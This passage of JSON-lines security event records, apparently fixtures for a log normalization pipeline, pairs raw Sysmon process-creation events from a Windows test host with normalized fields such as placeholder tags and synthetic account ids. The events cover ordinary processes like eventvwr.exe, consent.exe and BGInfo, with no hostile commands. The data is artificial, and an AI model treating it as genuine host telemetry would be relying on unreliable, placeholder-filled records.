AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=99FD6286539D36B93D1255473D75E14E14C7A9AE,MD5=3ECF427D2F76A86676DFB4A67EDDEF64,SHA256=6AD58BB7707259E0EB1599400A603134550B344CD86AB73B04D9DEF937D6A1C6,IMPHASH=F5BD79DC95E0303BDD85756328F16293\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\SecurityHealthService.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\securityhealthservice.exe", "object.process.guid": "747f3d96-b7a0-5ea4-0000-001027d81000", "object.process.hash.imphash": 
"F5BD79DC95E0303BDD85756328F16293", "object.process.hash.md5": "3ECF427D2F76A86676DFB4A67EDDEF64", "object.process.hash.sha1": "99FD6286539D36B93D1255473D75E14E14C7A9AE", "object.process.hash.sha256": "6AD58BB7707259E0EB1599400A603134550B344CD86AB73B04D9DEF937D6A1C6", "object.process.id": "7088", "object.process.meta": "Description:Windows Security Health Service | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "securityhealthservice.exe", "object.process.original_name": "SecurityHealthService.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "4.18.1807.16384 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:16.141Z", "type": "raw", "uuid": "03ea1245-cdbb-4043-b99e-3d71cc6ba532"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:16.0736537Z\"},\"EventRecordID\":\"27983\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Discovery - domain time\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:16.041\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a0-5ea4-0000-001026d11000}\"},{\"Name\":\"ProcessId\",\"text\":\"7056\"},{\"Name\":\"Image\",\"text\":\"C:\\\\BGinfo\\\\BGINFO.EXE\"},{\"Name\":\"FileVersion\",\"text\":\"4.20\"},{\"Name\":\"Description\",\"text\":\"BGInfo - Wallpaper text configurator\"},{\"Name\":\"Product\",\"text\":\"BGInfo\"},{\"Name\":\"Company\",\"text\":\"Sysinternals\"},{\"Name\":\"OriginalFileName\",\"text\":\"Bginfo.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\BGinfo\\\\BGINFO.EXE\\\" /accepteula /ic:\\\\bginfo\\\\bgconfig.bgi 
/timer:0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "Discovery - domain time", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\BGinfo\\BGINFO.EXE\" /accepteula /ic:\\bginfo\\bgconfig.bgi /timer:0", "object.process.cwd": "C:\\Windows\\system32\\", 
"object.process.fullpath": "c:\\bginfo\\bginfo.exe", "object.process.guid": "747f3d96-b7a0-5ea4-0000-001026d11000", "object.process.hash.imphash": "6EC19FF15BC88DDEDB96115003A96430", "object.process.hash.md5": "3652BA8B882BF6C69AF70CE73CF0D616", "object.process.hash.sha1": "1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25", "object.process.hash.sha256": "0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D", "object.process.id": "7056", "object.process.meta": "Description:BGInfo - Wallpaper text configurator | Product:BGInfo | Company:Sysinternals", "object.process.name": "bginfo.exe", "object.process.original_name": "Bginfo.exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\bginfo\\", "object.process.version": "4.20", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:16.041Z", "type": "raw", "uuid": "ab578b6a-2c89-445d-83ca-197978b63ca5"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:11.5165661Z\"},\"EventRecordID\":\"27970\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:11.513\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b79b-5ea4-0000-001001fc0f00}\"},{\"Name\":\"ProcessId\",\"text\":\"748\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"eventvwr.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00206cd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d36c\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00206cd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "119660", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": 
"747f3d96-b79b-5ea4-0000-001001fc0f00", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "748", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.original_name": "eventvwr.exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "119660", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:11.513Z", "type": "raw", "uuid": "809ef34d-9296-4667-9053-fdefba1c1f31"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:11.4024741Z\"},\"EventRecordID\":\"27958\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:11.317\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b79b-5ea4-0000-001075da0f00}\"},{\"Name\":\"ProcessId\",\"text\":\"6648\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.404 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"consent.exe\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 6964 318 0000021FF2606500\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-0010a74d0b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"6964\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 6964 318 0000021FF2606500", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-b79b-5ea4-0000-001075da0f00", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "6648", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b776-5ea4-0000-0010a74d0b00", "object.process.parent.id": "6964", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.404 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:11.317Z", "type": "raw", "uuid": "6e3e6e8b-d4da-4b47-9716-46221e71573e"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:11.3418156Z\"},\"EventRecordID\":\"27957\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:11.269\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b79b-5ea4-0000-00105bd50f00}\"},{\"Name\":\"ProcessId\",\"text\":\"6656\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"eventvwr.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": 
"747f3d96-b79b-5ea4-0000-00105bd50f00", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "6656", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.original_name": "eventvwr.exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:11.269Z", "type": "raw", "uuid": "6acbb399-3a7b-4565-a3dd-d4f0aa0c61cc"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:40.7124882Z\"},\"EventRecordID\":\"27841\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:34.611\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-001006590b00}\"},{\"Name\":\"ProcessId\",\"text\":\"7000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\\\\LocalBridge.exe\"},{\"Name\":\"FileVersion\",\"text\":\"18.2002.1101.0\"},{\"Name\":\"Description\",\"text\":\"LocalBridge\"},{\"Name\":\"Product\",\"text\":\"LocalBridge\"},{\"Name\":\"Company\"},{\"Name\":\"OriginalFileName\",\"text\":\"LocalBridge.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\\\\LocalBridge.exe\\\" /InvokerPRAID: Microsoft.MicrosoftOfficeHub 
notifications\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=723A4542BDEBD6BAC53008073369C476AE0C168E,MD5=405958774EEEF0EC5774764676FE94C4,SHA256=AA4D0C64AC44EA11BCEC87CF7A73BC479DB9047C21D544341B07558E0C1773B5,IMPHASH=00000000000000000000000000000000\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-001025270b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"6924\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\\LocalBridge.exe\" 
/InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program files\\windowsapps\\microsoft.microsoftofficehub_18.2002.1101.0_x64__8wekyb3d8bbwe\\localbridge.exe", "object.process.guid": "747f3d96-b776-5ea4-0000-001006590b00", "object.process.hash.imphash": "00000000000000000000000000000000", "object.process.hash.md5": "405958774EEEF0EC5774764676FE94C4", "object.process.hash.sha1": "723A4542BDEBD6BAC53008073369C476AE0C168E", "object.process.hash.sha256": "AA4D0C64AC44EA11BCEC87CF7A73BC479DB9047C21D544341B07558E0C1773B5", "object.process.id": "7000", "object.process.meta": "Description:LocalBridge | Product:LocalBridge | Company:", "object.process.name": "localbridge.exe", "object.process.original_name": "LocalBridge.exe", "object.process.parent.cmdline": 